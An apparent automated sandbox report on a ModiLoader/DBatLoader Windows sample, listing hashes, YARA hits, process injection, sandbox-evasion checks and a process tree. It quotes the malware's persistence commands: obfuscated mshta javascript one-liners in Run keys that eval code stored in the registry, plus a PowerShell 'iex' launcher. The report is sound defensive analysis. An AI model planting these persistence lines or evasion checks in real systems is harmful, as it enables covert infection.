Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
13/06/2024, 16:37
Static task
static1
Behavioral task
behavioral1
Sample
a68892873dcc694001962a99a70e1f9c_JaffaCakes118.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
a68892873dcc694001962a99a70e1f9c_JaffaCakes118.exe
Resource
win10v2004-20240508-en
General
-
Target
a68892873dcc694001962a99a70e1f9c_JaffaCakes118.exe
-
Size
260KB
-
MD5
a68892873dcc694001962a99a70e1f9c
-
SHA1
70cc033a58061dd599a26597c6adf57aab8c6ee2
-
SHA256
fadb7462c069b5da5e9bea226c7dbd31030a314d3920884f82e7796907e33586
-
SHA512
1eabbce80ef1a99cdfd0ac1fb811bb51c8c0862c41268543ac86cd892fc170ce926040dc1c1e3626d52cf69267d73efa0b6cf9368b69e2a57192df61151fc21c
-
SSDEEP
6144:1bs94nYY+uUMFemOFu3Ksm2Yn+EE9j+ivEyPYxJQeN:uSnYPweZnl+EER+iv6IeN
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2716 1252 mshta.exe 23 -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions regsvr32.exe -
Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
description ioc Process File opened (read-only) C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys regsvr32.exe -
ModiLoader Second Stage 59 IoCs
resource yara_rule behavioral1/memory/2468-2-0x0000000000400000-0x000000000043A000-memory.dmp modiloader_stage2 behavioral1/memory/2468-4-0x0000000000400000-0x000000000043A000-memory.dmp modiloader_stage2 behavioral1/memory/2468-5-0x0000000000400000-0x000000000043A000-memory.dmp modiloader_stage2 behavioral1/memory/2468-6-0x0000000001E10000-0x0000000001EE6000-memory.dmp modiloader_stage2 behavioral1/memory/2468-9-0x0000000001E10000-0x0000000001EE6000-memory.dmp modiloader_stage2 behavioral1/memory/2468-8-0x0000000001E10000-0x0000000001EE6000-memory.dmp modiloader_stage2 behavioral1/memory/2468-7-0x0000000001E10000-0x0000000001EE6000-memory.dmp modiloader_stage2 behavioral1/memory/2468-11-0x0000000001E10000-0x0000000001EE6000-memory.dmp modiloader_stage2 behavioral1/memory/2468-12-0x0000000001E10000-0x0000000001EE6000-memory.dmp modiloader_stage2 behavioral1/memory/2660-21-0x0000000006140000-0x0000000006216000-memory.dmp modiloader_stage2 behavioral1/memory/2196-23-0x00000000001C0000-0x0000000000301000-memory.dmp modiloader_stage2 behavioral1/memory/2196-24-0x00000000001C0000-0x0000000000301000-memory.dmp modiloader_stage2 behavioral1/memory/2660-26-0x0000000006140000-0x0000000006216000-memory.dmp modiloader_stage2 behavioral1/memory/2196-41-0x00000000001C0000-0x0000000000301000-memory.dmp modiloader_stage2 behavioral1/memory/2196-48-0x00000000001C0000-0x0000000000301000-memory.dmp modiloader_stage2 behavioral1/memory/2196-47-0x00000000001C0000-0x0000000000301000-memory.dmp modiloader_stage2 behavioral1/memory/2196-49-0x00000000001C0000-0x0000000000301000-memory.dmp modiloader_stage2 behavioral1/memory/2196-46-0x00000000001C0000-0x0000000000301000-memory.dmp modiloader_stage2 behavioral1/memory/2196-54-0x00000000001C0000-0x0000000000301000-memory.dmp modiloader_stage2 behavioral1/memory/2196-59-0x00000000001C0000-0x0000000000301000-memory.dmp modiloader_stage2 behavioral1/memory/2196-66-0x00000000001C0000-0x0000000000301000-memory.dmp modiloader_stage2 behavioral1/memory/2196-60-0x00000000001C0000-0x0000000000301000-memory.dmp modiloader_stage2 behavioral1/memory/2196-58-0x00000000001C0000-0x0000000000301000-memory.dmp modiloader_stage2 behavioral1/memory/2196-57-0x00000000001C0000-0x0000000000301000-memory.dmp modiloader_stage2 behavioral1/memory/2196-56-0x00000000001C0000-0x0000000000301000-memory.dmp modiloader_stage2 behavioral1/memory/2196-45-0x00000000001C0000-0x0000000000301000-memory.dmp modiloader_stage2 behavioral1/memory/2196-44-0x00000000001C0000-0x0000000000301000-memory.dmp modiloader_stage2 behavioral1/memory/2196-43-0x00000000001C0000-0x0000000000301000-memory.dmp modiloader_stage2 behavioral1/memory/2196-42-0x00000000001C0000-0x0000000000301000-memory.dmp modiloader_stage2 behavioral1/memory/2196-40-0x00000000001C0000-0x0000000000301000-memory.dmp modiloader_stage2 behavioral1/memory/2196-39-0x00000000001C0000-0x0000000000301000-memory.dmp modiloader_stage2 behavioral1/memory/2196-38-0x00000000001C0000-0x0000000000301000-memory.dmp modiloader_stage2 behavioral1/memory/1980-73-0x0000000000170000-0x00000000002B1000-memory.dmp modiloader_stage2 behavioral1/memory/1980-82-0x0000000000170000-0x00000000002B1000-memory.dmp modiloader_stage2 behavioral1/memory/1980-81-0x0000000000170000-0x00000000002B1000-memory.dmp modiloader_stage2 behavioral1/memory/1980-80-0x0000000000170000-0x00000000002B1000-memory.dmp modiloader_stage2 behavioral1/memory/1980-79-0x0000000000170000-0x00000000002B1000-memory.dmp modiloader_stage2 behavioral1/memory/1980-78-0x0000000000170000-0x00000000002B1000-memory.dmp modiloader_stage2 behavioral1/memory/1980-77-0x0000000000170000-0x00000000002B1000-memory.dmp modiloader_stage2 behavioral1/memory/1980-76-0x0000000000170000-0x00000000002B1000-memory.dmp modiloader_stage2 behavioral1/memory/1980-75-0x0000000000170000-0x00000000002B1000-memory.dmp modiloader_stage2 behavioral1/memory/1980-74-0x0000000000170000-0x00000000002B1000-memory.dmp modiloader_stage2 behavioral1/memory/1980-72-0x0000000000170000-0x00000000002B1000-memory.dmp modiloader_stage2 behavioral1/memory/1980-71-0x0000000000170000-0x00000000002B1000-memory.dmp modiloader_stage2 behavioral1/memory/1980-70-0x0000000000170000-0x00000000002B1000-memory.dmp modiloader_stage2 behavioral1/memory/1980-69-0x0000000000170000-0x00000000002B1000-memory.dmp modiloader_stage2 behavioral1/memory/1980-68-0x0000000000170000-0x00000000002B1000-memory.dmp modiloader_stage2 behavioral1/memory/1980-67-0x0000000000170000-0x00000000002B1000-memory.dmp modiloader_stage2 behavioral1/memory/2196-37-0x00000000001C0000-0x0000000000301000-memory.dmp modiloader_stage2 behavioral1/memory/2196-36-0x00000000001C0000-0x0000000000301000-memory.dmp modiloader_stage2 behavioral1/memory/2196-35-0x00000000001C0000-0x0000000000301000-memory.dmp modiloader_stage2 behavioral1/memory/2196-34-0x00000000001C0000-0x0000000000301000-memory.dmp modiloader_stage2 behavioral1/memory/2196-33-0x00000000001C0000-0x0000000000301000-memory.dmp modiloader_stage2 behavioral1/memory/2196-32-0x00000000001C0000-0x0000000000301000-memory.dmp modiloader_stage2 behavioral1/memory/2196-31-0x00000000001C0000-0x0000000000301000-memory.dmp modiloader_stage2 behavioral1/memory/2196-30-0x00000000001C0000-0x0000000000301000-memory.dmp modiloader_stage2 behavioral1/memory/2196-29-0x00000000001C0000-0x0000000000301000-memory.dmp modiloader_stage2 behavioral1/memory/2196-28-0x00000000001C0000-0x0000000000301000-memory.dmp modiloader_stage2 behavioral1/memory/2196-27-0x00000000001C0000-0x0000000000301000-memory.dmp modiloader_stage2 -
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools regsvr32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion regsvr32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion regsvr32.exe -
Deletes itself 1 IoCs
pid Process 2196 regsvr32.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\94d0f9.lnk regsvr32.exe -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Windows\\system32\\mshta.exe\" javascript:p2A1HcO=\"PUH\";Wm6=new%20ActiveXObject(\"WScript.Shell\");ntP7frJ=\"1t\";XvH54q=Wm6.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\bfow\\\\niegp\");U0qNK1leU=\"6zFZBs\";eval(XvH54q);sdKQN2l=\"y0\";" regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Windows\\system32\\mshta.exe\" javascript:l7LZM=\"rL5oaER\";f71j=new%20ActiveXObject(\"WScript.Shell\");g44Keo=\"u\";s4vqI=f71j.RegRead(\"HKCU\\\\software\\\\bfow\\\\niegp\");FcwTp2EK=\"nnLS\";eval(s4vqI);Jigz99=\"bdAMKhlH\";" regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Local\\7358d4\\e5ae70.lnk\"" regsvr32.exe -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum regsvr32.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 regsvr32.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 492 set thread context of 2468 492 a68892873dcc694001962a99a70e1f9c_JaffaCakes118.exe 29 PID 2660 set thread context of 2196 2660 powershell.exe 33 PID 2196 set thread context of 1980 2196 regsvr32.exe 34 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\International regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl regsvr32.exe -
Modifies registry class 7 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\2070de regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\2070de\shell regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\2070de\shell\open regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\2070de\shell\open\command regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\2070de\shell\open\command\ = "\"C:\\Windows\\system32\\mshta.exe\" \"javascript:YdvWN96=\"2UU4t9z\";z9g6=new ActiveXObject(\"WScript.Shell\");oD4xrVnZ=\"UrgD\";M4f2sS=z9g6.RegRead(\"HKCU\\\\software\\\\bfow\\\\niegp\");W2SSSk2vx=\"W55sfaVl\";eval(M4f2sS);deO4D7mVf=\"FeVdqm\";\"" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\.1879f4f regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\.1879f4f\ = "2070de" regsvr32.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2660 powershell.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe 2196 regsvr32.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 2660 powershell.exe 2196 regsvr32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2660 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 492 a68892873dcc694001962a99a70e1f9c_JaffaCakes118.exe -
Suspicious use of WriteProcessMemory 31 IoCs
description pid Process procid_target PID 492 wrote to memory of 2468 492 a68892873dcc694001962a99a70e1f9c_JaffaCakes118.exe 29 PID 492 wrote to memory of 2468 492 a68892873dcc694001962a99a70e1f9c_JaffaCakes118.exe 29 PID 492 wrote to memory of 2468 492 a68892873dcc694001962a99a70e1f9c_JaffaCakes118.exe 29 PID 492 wrote to memory of 2468 492 a68892873dcc694001962a99a70e1f9c_JaffaCakes118.exe 29 PID 492 wrote to memory of 2468 492 a68892873dcc694001962a99a70e1f9c_JaffaCakes118.exe 29 PID 492 wrote to memory of 2468 492 a68892873dcc694001962a99a70e1f9c_JaffaCakes118.exe 29 PID 492 wrote to memory of 2468 492 a68892873dcc694001962a99a70e1f9c_JaffaCakes118.exe 29 PID 492 wrote to memory of 2468 492 a68892873dcc694001962a99a70e1f9c_JaffaCakes118.exe 29 PID 492 wrote to memory of 2468 492 a68892873dcc694001962a99a70e1f9c_JaffaCakes118.exe 29 PID 492 wrote to memory of 2468 492 a68892873dcc694001962a99a70e1f9c_JaffaCakes118.exe 29 PID 492 wrote to memory of 2468 492 a68892873dcc694001962a99a70e1f9c_JaffaCakes118.exe 29 PID 2716 wrote to memory of 2660 2716 mshta.exe 31 PID 2716 wrote to memory of 2660 2716 mshta.exe 31 PID 2716 wrote to memory of 2660 2716 mshta.exe 31 PID 2716 wrote to memory of 2660 2716 mshta.exe 31 PID 2660 wrote to memory of 2196 2660 powershell.exe 33 PID 2660 wrote to memory of 2196 2660 powershell.exe 33 PID 2660 wrote to memory of 2196 2660 powershell.exe 33 PID 2660 wrote to memory of 2196 2660 powershell.exe 33 PID 2660 wrote to memory of 2196 2660 powershell.exe 33 PID 2660 wrote to memory of 2196 2660 powershell.exe 33 PID 2660 wrote to memory of 2196 2660 powershell.exe 33 PID 2660 wrote to memory of 2196 2660 powershell.exe 33 PID 2196 wrote to memory of 1980 2196 regsvr32.exe 34 PID 2196 wrote to memory of 1980 2196 regsvr32.exe 34 PID 2196 wrote to memory of 1980 2196 regsvr32.exe 34 PID 2196 wrote to memory of 1980 2196 regsvr32.exe 34 PID 2196 wrote to memory of 1980 2196 regsvr32.exe 34 PID 2196 wrote to memory of 1980 2196 regsvr32.exe 34 PID 2196 wrote to memory of 1980 2196 regsvr32.exe 34 PID 2196 wrote to memory of 1980 2196 regsvr32.exe 34
Processes
-
C:\Users\Admin\AppData\Local\Temp\a68892873dcc694001962a99a70e1f9c_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\a68892873dcc694001962a99a70e1f9c_JaffaCakes118.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:492 -
C:\Users\Admin\AppData\Local\Temp\a68892873dcc694001962a99a70e1f9c_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\a68892873dcc694001962a99a70e1f9c_JaffaCakes118.exe"2⤵PID:2468
-
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" javascript:Vq0pTu="5fR7UXgu";c4f=new%20ActiveXObject("WScript.Shell");f6eqh="YnYD3vV";hAVD4=c4f.RegRead("HKLM\\software\\Wow6432Node\\oZroWN\\C1Q4vR");Vahc06zY="TdZCjd";eval(hAVD4);Sd5EO="Nbb";1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2716 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:fqpxxf2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe3⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VirtualBox drivers on disk
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Deletes itself
- Drops startup file
- Adds Run key to start application
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2196 -
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\SysWOW64\regsvr32.exe"4⤵PID:1980
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
46KB
MD5214204ebae414ad05db1be2c78b50117
SHA112e622303de994171ce60755d5a82e21677e17c7
SHA256a2016673cae5c1e16850bd13fe0003e4ca4b8c1df3527beda268b5f5deaed279
SHA512c50da5fb93b86e3350792a4b2716f2f03ab21b73c9aa473dde9f621ecaf518b241a9328cef506b7d7f3aa4e86501b720f1b9b6709632279477b9d759afe47f39
-
Filesize
61B
MD514adc766d85da95cd0990ed6bcc1524d
SHA1e3c8f83a8fbfea658c9139d3e670d609745fb848
SHA2560245cf83462c2d8f2453beb1094af0133caee498c1ab5147ee361cb8a449c1c4
SHA512b4172624d668b6c1e7519cca9cbb53645ecc8b9aa1e4908801fd81983b092ed7ad26e3e29047ff5dc4e7744ee9f08dc61765133fa5957926cb4518127f4b60b8
-
Filesize
877B
MD5b3859c362eeae6d0e0903a9680a0173f
SHA1615b7428f419f2b2dc4006c38e46159385efa0be
SHA2568de08913c4efdfe4900751d5d89a201df00a87bd6b3d5ae91e0bec1b19a700e5
SHA512fc12412348031f48aee7d41012d62db22f65b0f10b5f46622ce5bc70b667f5e9ce96de83545e1408364b34f5689a2bbb92f2e0cc45c6f2a0fc1bd8b9fef499b6
-
Filesize
987B
MD5d868b60cd3bfb4f3bf5764538ae9b902
SHA116270640f0382c717135b5bb4967a80061819466
SHA2568c227c4ae42f1d27e7824050ffee39981dec5d423f9fc996649a6769f18c077c
SHA512cbad4392e9556074cb6c1584a1cd81a2aa7e7d4ca087923e3772486ec7439c062d787614606f62f4a5588ef03c830fb302a6a9c638965b3bd02af81cdf8aa37b
-
Filesize
31KB
MD5060941145511428fec974c0d0c521645
SHA1eebf4b16cc931ab03a44457c734db6fc36eb18a0
SHA2564f3494c844f35cbf915ae95870c2ce459961616c8c3d54ca7492de40cfd35c4d
SHA512ae2e6f9ba0d3fb570f5d4c26753699e9e0d388099081e41de93b698329ac15b027418987add4ea5478cb177480d7861f48202e4ef0c3dc1867a02bb60fd96a01